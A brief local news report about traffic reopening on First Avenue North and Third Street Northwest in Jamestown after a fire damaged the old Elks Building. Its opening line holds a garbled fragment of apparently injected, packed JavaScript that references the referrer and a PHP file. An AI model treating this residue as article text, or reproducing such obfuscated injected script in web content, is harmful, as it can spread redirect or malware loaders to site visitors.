JAMESTOWN tehfb|var|u0026u|referrer|htsat||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – More than two months after a large fire in downtown Jamestown, traffic flow is being restored to normal.

The Jamestown City Engineer’s office says the portions of First Avenue North and Third Street Northwest where traffic was restricted are being re-opened to normal traffic Tuesday.

The fire destroyed a building owned by Vining Oil and damaged the old Elks Building at the corner of Third Street Northwest and First Avenue North. Traffic had been restricted in the area to guard against a possible collapse of the old Elks Building.
